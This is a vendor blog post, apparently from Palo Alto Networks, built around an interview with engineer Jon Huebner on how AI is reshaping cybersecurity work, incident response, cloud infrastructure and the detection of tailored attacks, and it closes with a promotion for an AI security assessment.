Quantcast
Channel: XSOAR 8.4: What’s New - Palo Alto Networks Blog
Viewing all articles
Browse latest Browse all 57

AI in Cyber Is Here to Stay — How to Weather This Sea Change

$
0
0

{{interview_audio_title}}

00:00 00:00

“AI’s Impact in Cybersecurity” is a blog series based on interviews with a variety of experts at Palo Alto Networks and Unit 42, with roles in AI research, product management, consulting, engineering and more. Our objective is to present different viewpoints and predictions on how artificial intelligence is impacting the current threat landscape, how Palo Alto Networks protects itself and its customers, as well as implications for the future of cybersecurity.

In this blog, we interviewed Jon Huebner, an extended expertise engineer and consultant for Cortex XSIAM® at Palo Alto Networks, who shared his insights and predictions on the impact of AI in this domain.

Foreseeing a Shifting Job Market and Workflows

One of Huebner’s top predictions is that AI will massively affect the job market and how developers and engineers work, especially within enterprises. As AI becomes more integrated into cybersecurity tools and processes, it will likely lead to significant shifts in the way cybersecurity practitioners operate. Huebner elaborates further:

“It's also going to affect the security of enterprises, of how people use them, how people share their data. Both good and bad ways. It's going to affect productivity in a massive way. A lot of these cloud services will also go through some changes because a lot of that compute power needs to be purchased. It needs to run on a lot of resources. It gets warm, it's a great space heater, and then it's also going to start to impact if companies are hosting their own local LLMs for security, for fine-tuning reasons, and how they're going to be training their own models.”

One of the primary ways AI is projected to transform cybersecurity is by automating many of the repetitive and time-consuming tasks currently performed by humans. This includes tasks, such as log analysis and incident response. By automating these tasks, AI will allow cybersecurity practitioners to focus on more strategic and complex issues, such as developing new security architectures and forensic investigations.

ISC² or the International Information System Security Certification Consortium (a non-profit organization that specializes in training and certifications for cybersecurity professionals) surveyed cybersecurity professionals worldwide to understand the impact of emerging technologies, including AI, on their roles and responsibilities.

Their Cybersecurity Workforce Study, 2022 found that while AI is seen as a valuable tool for improving cybersecurity, many professionals are concerned about the potential for AI to be used maliciously and the need for new skills and knowledge to work effectively with these systems. They will need to understand how AI systems work, how to interpret their outputs, and how to ensure that they are operating effectively and ethically. This may require cybersecurity professionals to develop expertise in other areas, such as machine learning, data science and ethics, as the technology matures.

Another potential shift in job roles and responsibilities may occur as AI takes over certain tasks, freeing up cybersecurity professionals to focus on more strategic initiatives. For example, as AI improves in its ability to detect and respond to threats, cybersecurity analysts may spend more time on proactive measures, such as threat hunting and risk assessment.

Huebner also highlighted the potential implications of AI on enterprise security and data sharing practices, noting, "It's also going to affect the security of enterprises, of how people use them, how people share their data. Both good and bad ways." The integration of AI into cybersecurity systems could enhance security measures, but it also opens up new avenues for potential misuse and vulnerabilities:

  • AI-Powered Cyberattacks
    • Adversarial AI can be used to automate and scale cyberattacks, making them more difficult to detect and defend against.
    • Attackers can leverage AI to identify and exploit vulnerabilities in systems and networks more efficiently.
    • AI-generated phishing emails and social engineering attacks can be more convincing and harder for humans and traditional security systems to identify.
  • Poisoning and Evasion of AI Models
    • Attackers can manipulate the training data of AI models, leading to incorrect classifications or behaviors (data poisoning attacks).
    • Adversarial examples can be crafted to deceive AI models and evade detection, compromising the integrity of AI-based security systems.
  • Lack of Transparency and Explainability
    • The opaque nature of some AI models, particularly deep learning systems, can make it difficult to understand how they arrive at decisions, leading to potential biases or errors that could be exploited.
    • The lack of explainability in AI-driven security systems can make it challenging to audit and trust their decisions.
  • Insider Threats and Misuse of AI Tools
    • Insiders with access to AI-powered security tools could misuse them for malicious purposes, such as espionage, sabotage or data theft.
    • Insider knowledge of AI systems could be used to manipulate or bypass security measures.
  • Privacy and Data Protection Concerns
    • AI-driven security systems often require vast amounts of data for training and operation, raising concerns about data privacy and potential breaches.
    • The collection and storage of sensitive data for AI-based security could create new targets for attackers.
  • Over Reliance on AI and Automation
    • Organizations may become overly dependent on AI-driven security solutions, leading to a false sense of security and potentially overlooking human expertise and intuition.
    • Over reliance on automation could lead to delayed or ineffective responses to novel or complex threats that require human intervention.

To mitigate these risks, it is crucial for organizations to adopt a holistic approach to AI-driven cybersecurity. This includes rigorous testing and validation of AI models, regular audits and updates, as well as maintaining human oversight and intervention capabilities. Transparency, explainability and ethical considerations should be prioritized in the development and deployment of AI-based security systems.

LLMs Can Do Some Heavy Lifting

Productivity is another area where Huebner expects AI to have a profound impact. He predicts, "Productivity is going to improve as these LLMs help out." Large language models (LLMs) and other AI technologies are poised to streamline processes, augment human capabilities, and boost overall productivity in various sectors, including cybersecurity.

Large language models (LLMs) are becoming increasingly valuable tools for cybersecurity professionals, particularly in the context of incident response. When a cyberattack occurs, defenders often face the challenge of quickly piecing together information from various sources to understand the scope and nature of the threat. LLMs can greatly assist in this process by rapidly analyzing vast amounts of data, such as system logs, network traffic and threat intelligence feeds.

These AI-powered models can identify relevant patterns, anomalies and indicators of compromise, providing defenders with a clearer picture of the ongoing attack. Moreover, LLMs can translate complex technical data into plain language summaries, making it easier for incident responders to communicate findings and coordinate their efforts effectively.

The Impact of AI on Cloud Computing Infrastructure and Services

Further in the conversation, Huebner touched upon the impact of AI on cloud services, stating, "A lot of those cloud services will also go through some changes because a lot of those compute power that needs to be purchased. It needs to run."

The increasing demand for computational resources to power AI models and systems could drive changes in cloud service offerings and pricing models. As AI becomes more integral to various industries and applications, the need for robust, scalable and cost-effective computing infrastructure will continue to grow. To meet this demand, cloud service providers are likely to develop more specialized AI-focused offerings:

  • AI-Optimized Hardware – Cloud providers may invest in hardware specifically designed to accelerate AI workloads, such as GPUs, TPUs and FPGAs, to provide better performance and efficiency for AI models.
  • Pre-Trained Models and AI Services – Providers may offer a wider range of pretrained AI models and APIs, allowing businesses to easily integrate AI capabilities into their applications without the need for extensive in-house expertise or infrastructure.
  • Hybrid and Edge Computing Solutions – To address latency and data privacy concerns, cloud providers may expand their hybrid and edge computing offerings, enabling AI workloads to be processed closer to the data source.
  • Flexible Pricing Models – As AI workloads can be computationally intensive and vary in resource requirements, cloud providers may introduce more flexible and granular pricing models, such as serverless computing and pay-per-use options, to help businesses optimize costs based on their specific needs.
  • Collaboration and Data Sharing Platforms – Cloud providers may develop secure platforms that facilitate collaboration and data sharing among organizations, researchers and developers working on AI projects, fostering innovation and accelerating progress in the field.

Enhancing the Detection of Custom Attack Prevention and Ensuring Responsible Implementation

Addressing the application of AI in cybersecurity, Huebner acknowledged the limitations of current approaches: "A lot of people want it to be that magic black box that is just going to spit out, ‘Hey, this is an alert based off of these log sources, but I don't think that's fully accurate at this time.’" He emphasized that AI is currently focused on grouping and finding similarities between security events, optimizing analyst workflows, and reducing workloads.

Looking ahead, Huebner envisioned AI enabling better detections and more customized solutions. "As we get more data, as we find more use cases for these AIs and LLMs, we're going to start to find new ways for cybersecurity to take off," he predicted. When it comes to specific threats, Huebner believes AI-powered systems will be particularly effective at detecting and preventing tailored and custom attacks. He explains:

"I think a lot of them are going to be more tailored and custom attacks. We're seeing a lot more attackers using AIs, but defensively, these systems are able to detect when it's a more custom attack, and flag it and raise the severity, and make sure it's more seen and more visible, and handled accordingly."

Spy Vs. Spy

Huebner also acknowledged the possibility of AI being used by attackers against one another, creating a "battle" for control and stealing code, stating:

"We've actually seen some of that just starting already as well. Some of these codes are kind of… poisoning other models. They're poisoning other attackers. They're trying to ensure that they're the only ones that create, generate and use the code that they create, and then poison everyone else's model. So they're getting something different.”

To protect AI models from adversarial attacks and evasion techniques, Huebner underscored the importance of a robust security posture and defense-in-depth approach:

"Having the right security, the right security posture and then defense in depth – it's pretty much a lot of those products are out there in the security market. A lot of the security is there. It's really doing that security in depth and having a solid cybersecurity group or team on your side that understands what these attacks could be."

Huebner also discussed key performance metrics for evaluating the effectiveness of AI-powered security solutions, highlighting mean time to respond (MTTR) and the duration of open incidents as crucial factors. He stresses the importance of measuring analyst productivity, false positives and wasted time, noting that these metrics may vary across organizations due to specific nuances and workflows.

Lastly, Huebner stressed the significance of proper training and engineering processes to ensure AI models are implemented responsibly and transparently in security systems: "I believe a lot of this is going to come down to training and your engineering team; how they're building their things and how they're doing it. It's coming and it would really need to be a process and workflow that's built from the ground up." He emphasized the need for rigorous data verification, tailored models and well-defined processes.

In conclusion, Jon's predictions and insights underscore the transformative potential of AI in cybersecurity, while also highlighting the challenges and considerations that security practitioners must address. As AI continues to advance, staying vigilant, adapting defenses and fostering responsible implementation will be paramount in navigating the evolving threat landscape.

Curious to Learn More? Get an AI Security Assessment

Visit the Unit 42® AI Security Assessment. Empower yourself to adopt generative AI confidently across employee usage and AI application development with our threat intelligence and AI expertise.

The post AI in Cyber Is Here to Stay — How to Weather This Sea Change appeared first on Palo Alto Networks Blog.


Viewing all articles
Browse latest Browse all 57

Trending Articles